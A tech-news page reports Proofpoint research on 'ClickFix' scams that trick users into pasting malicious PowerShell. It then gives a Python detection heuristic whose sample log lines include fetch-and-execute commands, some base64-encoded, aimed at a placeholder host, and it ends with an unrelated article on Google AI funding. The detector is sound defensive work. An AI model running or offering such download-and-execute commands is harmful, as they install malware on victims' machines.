Hackers Exploit ‘ClickFix’ Scams To Spread Malware


  • Written by Kiara Fabbri Former Tech News Writer
  • Fact-Checked by Sarah Frazier Former Content Manager

Hackers exploit “ClickFix” social engineering, tricking users with fake errors or CAPTCHAs into executing PowerShell commands, spreading malware globally since 2024.

In a Rush? Here are the Quick Facts!

  • ClickFix scams disguise themselves as trusted services like Microsoft Word and Google Chrome.
  • Fake CAPTCHA challenges are part of ClickFix, delivering malware like AsyncRAT and Lumma Stealer.
  • ClickFix exploits users’ problem-solving instincts to bypass traditional security measures.

Cybercriminals are increasingly employing a sneaky social engineering tactic called “ClickFix” to distribute malware, targeting individuals’ instinct to troubleshoot problems on their own.

Research published by Proofpoint on Monday revealed the growing use of this method, which has been observed in numerous campaigns since March 2024.

The “ClickFix” technique relies on fake error messages displayed through pop-up dialog boxes. These messages appear legitimate and prompt users to fix an alleged issue themselves, explains Proofpoint.

Often, the instructions direct users to copy and paste a provided script into their computer’s PowerShell terminal, a tool used to execute commands on Windows systems. Unbeknownst to the user, this action downloads and runs malicious software.

Proofpoint has seen this approach used in phishing emails, malicious URLs, and compromised websites.

Threat actors disguise their scams as notifications from trusted sources like Microsoft Word, Google Chrome, and even local services tailored to specific industries, such as logistics or transportation.

A particularly devious variation of ClickFix incorporates fake CAPTCHA challenges, where users are asked to “prove they’re human,” explains Proofpoint.

The CAPTCHA trick is paired with instructions to execute malicious commands that install malware like AsyncRAT, DarkGate, or Lumma Stealer. Notably, a toolkit for this fake CAPTCHA tactic surfaced on GitHub, making it easier for criminals to use.

According to Proofpoint, hackers have targeted a range of organizations globally, including government entities in Ukraine. In one instance, they impersonated GitHub, using fake security alerts to direct users to malicious websites.

These scams have led to malware infections in over 300 organizations.

What makes ClickFix so effective is its ability to bypass many security measures. Since users voluntarily execute the malicious commands, traditional email filters and anti-virus tools are less likely to flag the activity, says Proofpoint.

Proofpoint emphasizes that this tactic is part of a broader trend in hacking: manipulating human behavior rather than just exploiting technical vulnerabilities. Hackers rely on users’ willingness to solve problems independently, often bypassing IT teams in the process.

To counter this threat, organizations should educate employees about ClickFix scams, reinforcing the importance of skepticism toward unsolicited troubleshooting instructions.

Staying vigilant and reporting suspicious emails or pop-ups can help prevent falling victim to these crafty attacks.
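
Because the user runs the command voluntarily, the most reliable place to catch ClickFix is the endpoint's process-creation log rather than the mail gateway. The following is an added example, not taken from Proofpoint's research: a triage heuristic that flags PowerShell command lines combining a download with execution, including ones hidden behind an encoded command. The indicator patterns, score weights, threshold, and sample command lines are constructed assumptions.

```python
import base64
import re

# Constructed heuristics (assumptions, not Proofpoint's detection rules).
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
FETCH = re.compile(r"\b(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod"
                   r"|downloadstring|downloadfile)\b", re.I)
EXEC = re.compile(r"\b(iex|invoke-expression|start-process)\b", re.I)
HIDDEN = re.compile(r"(?<![\w-])-w(in(dowstyle)?)?\s+(hidden|h|1)\b", re.I)
ENCODED = re.compile(
    r"(?<![\w-])-e(nc(odedcommand)?)?\s+(?P<b64>[A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def decode_encoded_command(cmdline):
    """Decode -EncodedCommand (base64 over UTF-16LE); '' if absent or invalid."""
    match = ENCODED.search(cmdline)
    if not match:
        return ""
    try:
        raw = base64.b64decode(match.group("b64"), validate=True)
        return raw.decode("utf-16-le")
    except ValueError:  # covers bad base64 and bad UTF-16 alike
        return ""

def assess(cmdline):
    """Return (score, reasons, urls) for one process command line."""
    if not POWERSHELL.search(cmdline):
        return 0, [], []
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + decoded  # inspect the decoded payload as well
    checks = [(FETCH.search(text), "network fetch"),
              (EXEC.search(text), "runs fetched content"),
              (HIDDEN.search(cmdline), "hidden window"),
              (decoded, "encoded command")]
    reasons = [label for hit, label in checks if hit]
    # Fetch plus execute in a single command is the core pattern: weight it.
    bonus = 2 if reasons[:2] == ["network fetch", "runs fetched content"] else 0
    return len(reasons) + bonus, reasons, URL.findall(text)

def triage(cmdlines, threshold=3):
    """Keep only the command lines that warrant analyst review."""
    return [c for c in cmdlines if assess(c)[0] >= threshold]

# Constructed samples, written as a process-creation log would record them.
SAMPLE = [
    "C:\\Windows\\System32\\notepad.exe C:\\Users\\a\\notes.txt",
    'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Temp"',
    'powershell.exe -w hidden -c "iex (iwr https://example.invalid/fix.txt)"',
    "powershell.exe -NoP -enc " + base64.b64encode(
        "irm https://example.invalid/v | iex".encode("utf-16-le")).decode(),
]
```

Calling `triage(SAMPLE)` returns only the last two entries; the URLs that `assess` extracts can be fed to proxy or DNS log searches to find other hosts that reached the same address.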

Google Announces $20 Million In Funding For Scientific AI Research


  • Written by Andrea Miliani Former Tech News Expert

Google announced $20 million in funding for AI scientific research yesterday during the inaugural AI for Science Forum, hosted by the Royal Society and Google DeepMind. The tech giant will also provide $2 million in cloud credits.

In a Rush? Here are the Quick Facts!

  • Google.org announced $22 million in funding for AI scientific research
  • The philanthropic organization wants to accelerate AI scientific breakthroughs across the globe
  • A team will identify and announce the organizations that will get the financial support

The financial support will be provided by Google.org—the charitable arm of the tech giant—and allocated to non-profit and academic organizations globally that are currently using AI to address complex problems across multiple fields of science.

“We’ll work with leaders internally across our Google DeepMind, Google Research and other AI-focused teams as well as external experts to identify and announce organizations,” states the announcement shared on Google’s blog.

With this new funding, Google.org is focusing on supporting the next AI scientific breakthroughs and is interested in research and investigations related to topics like sustainability, experimental biology, neglected disease research, and materials science.

The tech giant also announced $2 million in Google Cloud Credits as well as pro bono technical expertise from the company’s workers. This new funding adds to the more than $200 million the company has provided to accelerate scientific work.

The company highlighted this year’s Nobel Prize in Chemistry, awarded to Demis Hassabis and John Jumper for the advanced AI program AlphaFold developed by Google DeepMind, currently being used by over 2 million researchers around the world for different purposes including Parkinson’s treatment and the fight against malaria.

This year’s Nobel Prize in Physics was awarded to John J. Hopfield and Geoffrey E. Hinton—a former Google employee.

Other tech giants have been supporting AI developments in science. A few days ago, AWS announced it will provide up to $110 million in credits for scientific researchers to access its cloud data centers.